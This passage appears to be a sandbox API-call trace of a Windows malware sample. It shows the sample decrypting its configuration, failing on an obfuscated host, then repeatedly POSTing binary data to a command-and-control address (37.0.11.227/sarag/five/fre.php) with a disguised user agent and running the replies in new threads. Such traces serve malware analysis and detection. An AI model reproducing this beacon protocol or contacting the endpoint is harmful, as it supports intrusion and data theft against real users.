[0281.356] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0281.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.357] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0281.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.358] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0281.358] GetProcessHeap () returned 0x690000 [0281.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0281.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.359] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0281.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.360] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0281.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.361] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0281.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.370] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0281.370] GetProcessHeap () returned 0x690000 [0281.370] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0281.370] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0281.371] GetProcessHeap () returned 0x690000 [0281.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0281.371] GetProcessHeap () returned 0x690000 [0281.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0281.371] GetProcessHeap () returned 0x690000 [0281.372] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0281.372] GetProcessHeap () returned 0x690000 [0281.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0281.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.373] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.382] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0281.392] GetProcessHeap () returned 0x690000 [0281.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0281.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.393] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0281.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.394] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.395] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.395] GetProcessHeap () returned 0x690000 [0281.395] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0281.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.398] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0281.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.400] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0281.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.402] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0281.402] GetProcessHeap () returned 0x690000 [0281.402] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0281.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.404] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0281.406] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.409] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0281.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.411] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0281.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.413] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0281.413] GetProcessHeap () returned 0x690000 [0281.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0281.413] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0281.413] GetProcessHeap () returned 0x690000 [0281.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0281.421] socket (af=2, type=1, protocol=6) returned 0x8c0 [0281.421] connect (s=0x8c0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0281.469] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0281.469] GetProcessHeap () returned 0x690000 [0281.469] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0281.469] GetProcessHeap () returned 0x690000 [0281.469] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0281.470] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0281.470] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0281.470] GetProcessHeap () returned 0x690000 [0281.470] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0281.470] GetProcessHeap () returned 0x690000 [0281.471] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0281.471] GetProcessHeap () returned 0x690000 [0281.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0281.471] GetProcessHeap () returned 0x690000 [0281.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0281.471] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0281.474] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0281.474] GetProcessHeap () returned 0x690000 [0281.474] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0281.474] GetProcessHeap () returned 0x690000 [0281.474] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0281.474] send (s=0x8c0, buf=0x6ad508*, len=242, flags=0) returned 242 [0281.474] send (s=0x8c0, buf=0x6aba40*, len=159, flags=0) returned 159 [0281.474] GetProcessHeap () returned 0x690000 [0281.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0281.475] recv (in: s=0x8c0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0281.553] GetProcessHeap () returned 0x690000 [0281.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0281.554] GetProcessHeap () returned 0x690000 [0281.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0281.554] GetProcessHeap () returned 0x690000 [0281.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0281.554] GetProcessHeap () returned 0x690000 [0281.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0281.558] closesocket (s=0x8c0) returned 0 [0281.559] GetProcessHeap () returned 0x690000 [0281.559] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0281.559] GetProcessHeap () returned 0x690000 [0281.559] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0281.559] GetProcessHeap () returned 0x690000 [0281.560] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0281.560] GetProcessHeap () returned 0x690000 [0281.560] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0281.560] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16a8) returned 0x8c0 [0281.564] Sleep (dwMilliseconds=0xea60) [0281.567] GetProcessHeap () returned 0x690000 [0281.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0281.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.568] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.574] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0281.583] GetProcessHeap () returned 0x690000 [0281.583] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0281.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.584] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0281.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.585] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.586] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.586] GetProcessHeap () returned 0x690000 [0281.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0281.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.588] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0281.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.589] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0281.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.590] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0281.590] GetProcessHeap () returned 0x690000 [0281.590] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0281.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.591] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0281.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.592] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0281.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.593] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0281.594] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.594] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0281.594] GetProcessHeap () returned 0x690000 [0281.594] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0281.595] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0281.595] GetProcessHeap () returned 0x690000 [0281.595] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0281.602] GetProcessHeap () returned 0x690000 [0281.602] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0281.602] GetProcessHeap () returned 0x690000 [0281.603] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0281.603] GetProcessHeap () returned 0x690000 [0281.603] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0281.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.604] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.619] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0281.629] GetProcessHeap () returned 0x690000 [0281.629] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0281.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.631] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0281.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.632] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.633] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.633] GetProcessHeap () returned 0x690000 [0281.633] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0281.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.634] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0281.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.635] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0281.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.637] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0281.637] GetProcessHeap () returned 0x690000 [0281.637] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0281.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.638] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0281.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.639] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0281.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.640] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0281.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.643] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0281.643] GetProcessHeap () returned 0x690000 [0281.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0281.643] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0281.643] GetProcessHeap () returned 0x690000 [0281.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0281.643] socket (af=2, type=1, protocol=6) returned 0x8c4 [0281.643] connect (s=0x8c4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0281.668] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0281.668] GetProcessHeap () returned 0x690000 [0281.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0281.668] GetProcessHeap () returned 0x690000 [0281.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0281.669] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0281.670] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0281.670] GetProcessHeap () returned 0x690000 [0281.672] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0281.672] GetProcessHeap () returned 0x690000 [0281.673] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0281.673] GetProcessHeap () returned 0x690000 [0281.673] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0281.673] GetProcessHeap () returned 0x690000 [0281.673] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0281.674] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0281.676] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0281.676] GetProcessHeap () returned 0x690000 [0281.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0281.676] GetProcessHeap () returned 0x690000 [0281.677] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0281.677] send (s=0x8c4, buf=0x6ad508*, len=242, flags=0) returned 242 [0281.678] send (s=0x8c4, buf=0x6aba40*, len=159, flags=0) returned 159 [0281.678] GetProcessHeap () returned 0x690000 [0281.678] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0281.678] recv (in: s=0x8c4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0281.756] GetProcessHeap () returned 0x690000 [0281.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0281.756] GetProcessHeap () returned 0x690000 [0281.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0281.757] GetProcessHeap () returned 0x690000 [0281.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0281.759] GetProcessHeap () returned 0x690000 [0281.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0281.759] closesocket (s=0x8c4) returned 0 [0281.760] GetProcessHeap () returned 0x690000 [0281.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0281.760] GetProcessHeap () returned 0x690000 [0281.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0281.761] GetProcessHeap () returned 0x690000 [0281.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0281.761] GetProcessHeap () returned 0x690000 [0281.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0281.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16ac) returned 0x8c4 [0281.779] Sleep (dwMilliseconds=0xea60) [0281.781] GetProcessHeap () returned 0x690000 [0281.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0281.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.783] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.790] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0281.799] GetProcessHeap () returned 0x690000 [0281.799] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0281.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.800] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0281.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.801] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.802] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.803] GetProcessHeap () returned 0x690000 [0281.803] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0281.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.804] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0281.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.805] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0281.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.806] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0281.806] GetProcessHeap () returned 0x690000 [0281.806] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0281.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.808] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0281.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.811] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0281.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 